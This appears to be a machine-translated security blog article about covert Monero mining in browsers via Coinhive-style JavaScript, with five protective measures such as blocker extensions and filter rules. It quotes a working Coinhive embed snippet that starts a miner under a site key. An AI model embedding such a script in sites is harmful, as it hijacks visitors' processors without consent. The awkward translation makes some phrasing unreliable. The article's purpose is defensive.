How to protect yourself against JavaScript cryptocurrency excavators?

For a few days, emotions have not subsided after the discovery of malicious JavaScript on websites to dig the Monero cryptocurrency. Someone apparently was not afraid and decided to use the processing power of users' computers to get rich, by the way, probably forgot to inform the other party about their intentions. As a result, the injured observe slightly higher electricity bills, and the perpetrators count income from an additional source.

The domino effect

One computer is definitely not enough to successfully extract cryptocurrency. Companies such as Coinhive and JSECoin offer a few dozen percent of profits to offer browser scripts that run on devices begin to use the power of the processor - of course, without the users' knowledge. Theoretically, any owner of a website or botnet can use its popularity to get rich. All you need to do is create an account on the seller's website that offers the API in JavaScript and paste the code into the source of the page:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
       var miner = new CoinHive.User('<site-key>', 'john-doe');
       miner.start();
</script>

If a non-stop 10 people sit on the website, then the owner of the script, identified by the unique key and username, can count on earnings of ~ $ 27 a month. The commission is 30%.

The scale of the problem

Most websites contain similar malicious scripts rather accidentally. This is most often due to file swapping after exploiting the vulnerabilities in server configuration or web-applications. However, we can assume that websites such as gazeta.pl, katowice.naszemiasto.pl, warszawa.naszemiasto.pl, nowiny24.pl, rp.pl and many, many others have a common denominator - suppliers of rotating ads who do not often verify this , which goes to their systems displaying advertisements on partner websites.

The Safe Browser for Chrome also included a kick script.
CoinHive script on one of the Tor network input nodes.

How to protect yourself?

We provide 5 ways to protect yourself by JavaScript scripts digging a cryptocurrency. Mirroring of the protective layers is not necessary, although the use of some of them certainly will not hurt.

  1. In the public GitHub repository there is a " No Coin " plugin for Firefox , Chrome and Opera browsers . The extension has already been added to the official repositories of each manufacturer. We recommend its installation, because the extension protects not only by the described script for digging Monero, but also from excavators of other cryptocurrencies.
  2. A similar effect is achieved by installing the " uBlock Origin " ad blocker. In the " my filters " configuration, we add coin-hive.com/lib/coinhive.min.js preceding the entry with the https: // protocol. In addition to blocking ads, spam hosts, hosts with malicious ads, spyware hosts and malware hosts, we gain the ability to block custom URLs.
  3. We install a very effective Bitdefender Trafichlight plugin for scanning web pages. The installer will automatically detect the browser (Chrome, Firefox or Safari) and move the user to the repository with the extension. By installing the Bitdefender add-on, we get one of the most effective scanners in the world to detect phishing, malware and websites with scams, as well as protection already in the search results.
  4. We install the NoScript add-in for browsers.
  5. Most security programs with modules for scanning websites should already detect similar malicious scripts. Wanting or not wanting, once again we are richer with experience that confirms the belief that the protection of computers should be comprehensive and begin with the browser.


Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.